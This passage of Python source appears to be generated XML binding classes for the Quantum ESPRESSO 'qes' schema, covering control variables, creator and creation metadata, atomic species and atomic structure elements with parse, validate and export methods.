            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'nstep')
            self.nstep = ival_
        elif nodeName_ == 'etot_conv_thr' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'etot_conv_thr')
            self.etot_conv_thr = fval_
        elif nodeName_ == 'forc_conv_thr' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'forc_conv_thr')
            self.forc_conv_thr = fval_
        elif nodeName_ == 'press_conv_thr' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'press_conv_thr')
            self.press_conv_thr = fval_
        elif nodeName_ == 'verbosity':
            verbosity_ = child_.text
            verbosity_ = self.gds_validate_string(verbosity_, node, 'verbosity')
            self.verbosity = verbosity_
            # validate type lowhighType
            self.validate_lowhighType(self.verbosity)
        elif nodeName_ == 'print_every' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'print_every')
            self.print_every = ival_
# end class control_variablesType
class xml_formatType(GeneratedsSuper):
    """Generated binding for the qes ``xml_format`` element.

    A simple element whose text content is stored in ``valueOf_`` and
    which carries two optional XML attributes, NAME and VERSION.
    """
    subclass = None
    superclass = None
    def __init__(self, NAME=None, VERSION=None, valueOf_=None):
        """Store the two attributes and the element's text content."""
        self.original_tagname_ = None
        self.NAME = _cast(None, NAME)
        self.VERSION = _cast(None, VERSION)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        """Instantiate this class, honouring any registered override."""
        if CurrentSubclassModule_ is not None:
            override = getSubclassFromModule_(
                CurrentSubclassModule_, xml_formatType)
            if override is not None:
                return override(*args_, **kwargs_)
        if xml_formatType.subclass:
            return xml_formatType.subclass(*args_, **kwargs_)
        return xml_formatType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_NAME(self):
        return self.NAME
    def set_NAME(self, NAME):
        self.NAME = NAME
    def get_VERSION(self):
        return self.VERSION
    def set_VERSION(self, VERSION):
        self.VERSION = VERSION
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        """Return True when there is text content worth emitting.

        Numeric values (including 0) always count as content; any other
        value is judged by its truthiness.  Note: the exact-type check is
        deliberate so that bool values fall through to truthiness.
        """
        if type(self.valueOf_) in (int, float):
            return True
        return bool(self.valueOf_)
    def export(self, outfile, level, namespaceprefix_='qes:', name_='xml_formatType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element as XML to *outfile* at indent *level*."""
        ns_override = GenerateDSNamespaceDefs_.get('xml_formatType')
        if ns_override is not None:
            namespacedef_ = ns_override
        line_end = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespaceprefix_, name_,
            ' ' + namespacedef_ if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='xml_formatType')
        if not self.hasContent_():
            # Empty element: self-closing tag.
            outfile.write('/>%s' % line_end)
            return
        outfile.write('>')
        outfile.write(self.convert_unicode(self.valueOf_))
        self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='xml_formatType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespaceprefix_, name_, line_end))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='xml_formatType'):
        """Emit the NAME and VERSION attributes when present."""
        for attr_name in ('NAME', 'VERSION'):
            attr_val = getattr(self, attr_name)
            if attr_val is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (
                    attr_name,
                    self.gds_encode(self.gds_format_string(
                        quote_attrib(attr_val), input_name=attr_name))))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='xml_formatType', fromsubclass_=False, pretty_print=True):
        """No child elements to write."""
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_node in node:
            tag = Tag_pattern_.match(child_node.tag).groups()[-1]
            self.buildChildren(child_node, node, tag)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read the NAME and VERSION attributes from *node* if present."""
        for attr_name in ('NAME', 'VERSION'):
            attr_val = find_attr_value_(attr_name, node)
            if attr_val is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, attr_val)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """No child elements expected; nothing to do."""
        pass
# end class xml_formatType
class creatorType(GeneratedsSuper):
    """Generated binding for the qes ``creator`` element.

    A simple element whose text content is stored in ``valueOf_`` and
    which carries two optional XML attributes, NAME and VERSION.
    """
    subclass = None
    superclass = None
    def __init__(self, NAME=None, VERSION=None, valueOf_=None):
        """Store the two attributes and the element's text content."""
        self.original_tagname_ = None
        self.NAME = _cast(None, NAME)
        self.VERSION = _cast(None, VERSION)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        """Instantiate this class, honouring any registered override."""
        if CurrentSubclassModule_ is not None:
            override = getSubclassFromModule_(
                CurrentSubclassModule_, creatorType)
            if override is not None:
                return override(*args_, **kwargs_)
        if creatorType.subclass:
            return creatorType.subclass(*args_, **kwargs_)
        return creatorType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_NAME(self):
        return self.NAME
    def set_NAME(self, NAME):
        self.NAME = NAME
    def get_VERSION(self):
        return self.VERSION
    def set_VERSION(self, VERSION):
        self.VERSION = VERSION
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        """Return True when there is text content worth emitting.

        Numeric values (including 0) always count as content; any other
        value is judged by its truthiness.  Note: the exact-type check is
        deliberate so that bool values fall through to truthiness.
        """
        if type(self.valueOf_) in (int, float):
            return True
        return bool(self.valueOf_)
    def export(self, outfile, level, namespaceprefix_='qes:', name_='creatorType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element as XML to *outfile* at indent *level*."""
        ns_override = GenerateDSNamespaceDefs_.get('creatorType')
        if ns_override is not None:
            namespacedef_ = ns_override
        line_end = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespaceprefix_, name_,
            ' ' + namespacedef_ if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='creatorType')
        if not self.hasContent_():
            # Empty element: self-closing tag.
            outfile.write('/>%s' % line_end)
            return
        outfile.write('>')
        outfile.write(self.convert_unicode(self.valueOf_))
        self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='creatorType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespaceprefix_, name_, line_end))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='creatorType'):
        """Emit the NAME and VERSION attributes when present."""
        for attr_name in ('NAME', 'VERSION'):
            attr_val = getattr(self, attr_name)
            if attr_val is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (
                    attr_name,
                    self.gds_encode(self.gds_format_string(
                        quote_attrib(attr_val), input_name=attr_name))))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='creatorType', fromsubclass_=False, pretty_print=True):
        """No child elements to write."""
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_node in node:
            tag = Tag_pattern_.match(child_node.tag).groups()[-1]
            self.buildChildren(child_node, node, tag)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read the NAME and VERSION attributes from *node* if present."""
        for attr_name in ('NAME', 'VERSION'):
            attr_val = find_attr_value_(attr_name, node)
            if attr_val is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, attr_val)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """No child elements expected; nothing to do."""
        pass
# end class creatorType
class createdType(GeneratedsSuper):
    """Generated binding for the ``created`` element.

    Carries two string attributes, ``DATE`` and ``TIME``, plus optional
    mixed text content in ``valueOf_``.
    """
    subclass = None
    superclass = None

    def __init__(self, DATE=None, TIME=None, valueOf_=None):
        self.original_tagname_ = None
        self.DATE = _cast(None, DATE)
        self.TIME = _cast(None, TIME)
        self.valueOf_ = valueOf_

    @staticmethod
    def factory(*args_, **kwargs_):
        """Instantiate this class, honoring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            override = getSubclassFromModule_(
                CurrentSubclassModule_, createdType)
            if override is not None:
                return override(*args_, **kwargs_)
        cls = createdType.subclass or createdType
        return cls(*args_, **kwargs_)

    # -- plain accessors -------------------------------------------------
    def get_DATE(self):
        return self.DATE

    def set_DATE(self, DATE):
        self.DATE = DATE

    def get_TIME(self):
        return self.TIME

    def set_TIME(self, TIME):
        self.TIME = TIME

    def get_valueOf_(self):
        return self.valueOf_

    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_

    def hasContent_(self):
        """Return True when there is text content worth serializing.

        Numeric values (including 0 / 0.0) always count as content; any
        other value is judged by its truthiness.
        """
        if type(self.valueOf_) in [int, float]:
            return True
        return bool(self.valueOf_)

    def export(self, outfile, level, namespaceprefix_='qes:', name_='createdType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element as XML to *outfile* at the given indent level."""
        ns_override = GenerateDSNamespaceDefs_.get('createdType')
        if ns_override is not None:
            namespacedef_ = ns_override
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        ns_decl = ' ' + namespacedef_ if namespacedef_ else ''
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, ns_decl))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='createdType')
        if not self.hasContent_():
            # No content: self-closing element.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(self.convert_unicode(self.valueOf_))
        self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='createdType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))

    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='createdType'):
        """Emit the DATE and TIME attributes when set and not yet written."""
        for attr_name in ('DATE', 'TIME'):
            attr_value = getattr(self, attr_name)
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                encoded = self.gds_encode(self.gds_format_string(
                    quote_attrib(attr_value), input_name=attr_name))
                outfile.write(' %s=%s' % (attr_name, encoded))

    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='createdType', fromsubclass_=False, pretty_print=True):
        # Simple content type: no child elements.
        pass

    def build(self, node):
        """Populate this instance from a parsed ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_name = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_name)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """Copy the DATE and TIME attribute strings off *node*."""
        for attr_name in ('DATE', 'TIME'):
            attr_value = find_attr_value_(attr_name, node)
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, attr_value)

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content type: nothing to dispatch.
        pass
# end class createdType
class atomic_speciesType(GeneratedsSuper):
    """Generated XML binding for the ``atomic_species`` element.

    Holds a list of ``species`` child elements plus the ``ntyp``
    (positive integer) and ``pseudo_dir`` (string) attributes.
    """
    subclass = None
    superclass = None
    def __init__(self, ntyp=None, pseudo_dir=None, species=None):
        self.original_tagname_ = None
        self.ntyp = _cast(int, ntyp)
        self.pseudo_dir = _cast(None, pseudo_dir)
        # Fresh list per instance (avoids the mutable-default pitfall).
        if species is None:
            self.species = []
        else:
            self.species = species
    def factory(*args_, **kwargs_):
        """Instantiate this class or a registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, atomic_speciesType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if atomic_speciesType.subclass:
            return atomic_speciesType.subclass(*args_, **kwargs_)
        else:
            return atomic_speciesType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain accessors for the child list and the two attributes.
    def get_species(self): return self.species
    def set_species(self, species): self.species = species
    def add_species(self, value): self.species.append(value)
    def insert_species_at(self, index, value): self.species.insert(index, value)
    def replace_species_at(self, index, value): self.species[index] = value
    def get_ntyp(self): return self.ntyp
    def set_ntyp(self, ntyp): self.ntyp = ntyp
    def get_pseudo_dir(self): return self.pseudo_dir
    def set_pseudo_dir(self, pseudo_dir): self.pseudo_dir = pseudo_dir
    def hasContent_(self):
        """Return True when at least one ``species`` child is present."""
        if (
            self.species
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='atomic_speciesType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element and its children as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('atomic_speciesType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='atomic_speciesType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='atomic_speciesType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing element.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='atomic_speciesType'):
        """Emit the ``ntyp`` and ``pseudo_dir`` attributes when set."""
        if self.ntyp is not None and 'ntyp' not in already_processed:
            already_processed.add('ntyp')
            outfile.write(' ntyp="%s"' % self.gds_format_integer(self.ntyp, input_name='ntyp'))
        if self.pseudo_dir is not None and 'pseudo_dir' not in already_processed:
            already_processed.add('pseudo_dir')
            outfile.write(' pseudo_dir=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.pseudo_dir), input_name='pseudo_dir')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='atomic_speciesType', fromsubclass_=False, pretty_print=True):
        """Export each ``species`` child element in order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for species_ in self.species:
            species_.export(outfile, level, namespaceprefix_, name_='species', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from a parsed ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse attributes; ``ntyp`` must be a positive integer."""
        value = find_attr_value_('ntyp', node)
        if value is not None and 'ntyp' not in already_processed:
            already_processed.add('ntyp')
            try:
                self.ntyp = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.ntyp <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        value = find_attr_value_('pseudo_dir', node)
        if value is not None and 'pseudo_dir' not in already_processed:
            already_processed.add('pseudo_dir')
            self.pseudo_dir = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch a parsed ``species`` child into ``self.species``."""
        if nodeName_ == 'species':
            obj_ = speciesType.factory()
            obj_.build(child_)
            self.species.append(obj_)
            obj_.original_tagname_ = 'species'
# end class atomic_speciesType
class speciesType(GeneratedsSuper):
    """Generated XML binding for a single ``species`` element.

    Child elements: ``mass``, ``pseudo_file``, ``starting_magnetization``
    (default 0.0), ``spin_teta``, ``spin_phi``.  Attribute: ``name``.
    """
    subclass = None
    superclass = None
    def __init__(self, name=None, mass=None, pseudo_file=None, starting_magnetization=0.0, spin_teta=None, spin_phi=None):
        self.original_tagname_ = None
        self.name = _cast(None, name)
        self.mass = mass
        self.pseudo_file = pseudo_file
        self.starting_magnetization = starting_magnetization
        self.spin_teta = spin_teta
        self.spin_phi = spin_phi
    def factory(*args_, **kwargs_):
        """Instantiate this class or a registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, speciesType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if speciesType.subclass:
            return speciesType.subclass(*args_, **kwargs_)
        else:
            return speciesType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain accessors for child elements and the ``name`` attribute.
    def get_mass(self): return self.mass
    def set_mass(self, mass): self.mass = mass
    def get_pseudo_file(self): return self.pseudo_file
    def set_pseudo_file(self, pseudo_file): self.pseudo_file = pseudo_file
    def get_starting_magnetization(self): return self.starting_magnetization
    def set_starting_magnetization(self, starting_magnetization): self.starting_magnetization = starting_magnetization
    def get_spin_teta(self): return self.spin_teta
    def set_spin_teta(self, spin_teta): self.spin_teta = spin_teta
    def get_spin_phi(self): return self.spin_phi
    def set_spin_phi(self, spin_phi): self.spin_phi = spin_phi
    def get_name(self): return self.name
    def set_name(self, name): self.name = name
    def hasContent_(self):
        """Return True when any child element needs to be serialized.

        Note: ``starting_magnetization`` counts only when it differs from
        its schema default of 0.0.
        """
        if (
            self.mass is not None or
            self.pseudo_file is not None or
            self.starting_magnetization != 0.0 or
            self.spin_teta is not None or
            self.spin_phi is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='speciesType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element and its children as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('speciesType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='speciesType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='speciesType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing element.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='speciesType'):
        """Emit the ``name`` attribute when set."""
        if self.name is not None and 'name' not in already_processed:
            already_processed.add('name')
            outfile.write(' name=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.name), input_name='name')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='speciesType', fromsubclass_=False, pretty_print=True):
        """Export each set child element with a hard-coded ``qes:`` prefix."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.mass is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:mass>%s</qes:mass>%s' % (self.gds_format_double(self.mass, input_name='mass'), eol_))
        if self.pseudo_file is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:pseudo_file>%s</qes:pseudo_file>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.pseudo_file), input_name='pseudo_file')), eol_))
        # Default value 0.0 is suppressed on output (matches hasContent_).
        if self.starting_magnetization != 0.0:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:starting_magnetization>%s</qes:starting_magnetization>%s' % (self.gds_format_double(self.starting_magnetization, input_name='starting_magnetization'), eol_))
        if self.spin_teta is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:spin_teta>%s</qes:spin_teta>%s' % (self.gds_format_double(self.spin_teta, input_name='spin_teta'), eol_))
        if self.spin_phi is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:spin_phi>%s</qes:spin_phi>%s' % (self.gds_format_double(self.spin_phi, input_name='spin_phi'), eol_))
    def build(self, node):
        """Populate this instance from a parsed ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Copy the ``name`` attribute string off *node*."""
        value = find_attr_value_('name', node)
        if value is not None and 'name' not in already_processed:
            already_processed.add('name')
            self.name = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one parsed child element; floats are validated via
        ``gds_validate_float`` and bad text raises a parse error."""
        if nodeName_ == 'mass' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'mass')
            self.mass = fval_
        elif nodeName_ == 'pseudo_file':
            pseudo_file_ = child_.text
            pseudo_file_ = self.gds_validate_string(pseudo_file_, node, 'pseudo_file')
            self.pseudo_file = pseudo_file_
        elif nodeName_ == 'starting_magnetization' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'starting_magnetization')
            self.starting_magnetization = fval_
        elif nodeName_ == 'spin_teta' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'spin_teta')
            self.spin_teta = fval_
        elif nodeName_ == 'spin_phi' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'spin_phi')
            self.spin_phi = fval_
# end class speciesType
class atomic_structureType(GeneratedsSuper):
    """Generated XML binding for the ``atomic_structure`` element.

    Child elements: ``atomic_positions``, ``wyckoff_positions``,
    ``crystal_positions``, ``cell``.  Attributes: ``nat`` (positive int),
    ``alat`` (double), ``bravais_index`` (positive int).
    """
    subclass = None
    superclass = None
    def __init__(self, nat=None, alat=None, bravais_index=None, atomic_positions=None, wyckoff_positions=None, crystal_positions=None, cell=None):
        self.original_tagname_ = None
        self.nat = _cast(int, nat)
        self.alat = _cast(float, alat)
        self.bravais_index = _cast(int, bravais_index)
        self.atomic_positions = atomic_positions
        self.wyckoff_positions = wyckoff_positions
        self.crystal_positions = crystal_positions
        self.cell = cell
    def factory(*args_, **kwargs_):
        """Instantiate this class or a registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, atomic_structureType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if atomic_structureType.subclass:
            return atomic_structureType.subclass(*args_, **kwargs_)
        else:
            return atomic_structureType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain accessors for child elements and attributes.
    def get_atomic_positions(self): return self.atomic_positions
    def set_atomic_positions(self, atomic_positions): self.atomic_positions = atomic_positions
    def get_wyckoff_positions(self): return self.wyckoff_positions
    def set_wyckoff_positions(self, wyckoff_positions): self.wyckoff_positions = wyckoff_positions
    def get_crystal_positions(self): return self.crystal_positions
    def set_crystal_positions(self, crystal_positions): self.crystal_positions = crystal_positions
    def get_cell(self): return self.cell
    def set_cell(self, cell): self.cell = cell
    def get_nat(self): return self.nat
    def set_nat(self, nat): self.nat = nat
    def get_alat(self): return self.alat
    def set_alat(self, alat): self.alat = alat
    def get_bravais_index(self): return self.bravais_index
    def set_bravais_index(self, bravais_index): self.bravais_index = bravais_index
    def hasContent_(self):
        """Return True when any child element is present."""
        if (
            self.atomic_positions is not None or
            self.wyckoff_positions is not None or
            self.crystal_positions is not None or
            self.cell is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='atomic_structureType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element and its children as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('atomic_structureType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='atomic_structureType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='atomic_structureType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing element.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='atomic_structureType'):
        """Emit the ``nat``, ``alat`` and ``bravais_index`` attributes when set."""
        if self.nat is not None and 'nat' not in already_processed:
            already_processed.add('nat')
            outfile.write(' nat="%s"' % self.gds_format_integer(self.nat, input_name='nat'))
        if self.alat is not None and 'alat' not in already_processed:
            already_processed.add('alat')
            outfile.write(' alat="%s"' % self.gds_format_double(self.alat, input_name='alat'))
        if self.bravais_index is not None and 'bravais_index' not in already_processed:
            already_processed.add('bravais_index')
            outfile.write(' bravais_index="%s"' % self.gds_format_integer(self.bravais_index, input_name='bravais_index'))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='atomic_structureType', fromsubclass_=False, pretty_print=True):
        """Export each present child element."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.atomic_positions is not None:
            self.atomic_positions.export(outfile, level, namespaceprefix_, name_='atomic_positions', pretty_print=pretty_print)
        if self.wyckoff_positions is not None:
            self.wyckoff_positions.export(outfile, level, namespaceprefix_, name_='wyckoff_positions', pretty_print=pretty_print)
        if self.crystal_positions is not None:
            self.crystal_positions.export(outfile, level, namespaceprefix_, name_='crystal_positions', pretty_print=pretty_print)
        if self.cell is not None:
            self.cell.export(outfile, level, namespaceprefix_, name_='cell', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from a parsed ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse attributes; integer ones must be positive.

        NOTE(review): a malformed ``alat`` raises a bare ValueError here,
        unlike the integer attributes which go through raise_parse_error —
        generator inconsistency, kept as-is.
        """
        value = find_attr_value_('nat', node)
        if value is not None and 'nat' not in already_processed:
            already_processed.add('nat')
            try:
                self.nat = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.nat <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
        value = find_attr_value_('alat', node)
        if value is not None and 'alat' not in already_processed:
            already_processed.add('alat')
            try:
                self.alat = float(value)
            except ValueError as exp:
                raise ValueError('Bad float/double attribute (alat): %s' % exp)
        value = find_attr_value_('bravais_index', node)
        if value is not None and 'bravais_index' not in already_processed:
            already_processed.add('bravais_index')
            try:
                self.bravais_index = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.bravais_index <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one parsed child element into the matching slot.

        ``crystal_positions`` reuses atomic_positionsType (same shape).
        """
        if nodeName_ == 'atomic_positions':
            obj_ = atomic_positionsType.factory()
            obj_.build(child_)
            self.atomic_positions = obj_
            obj_.original_tagname_ = 'atomic_positions'
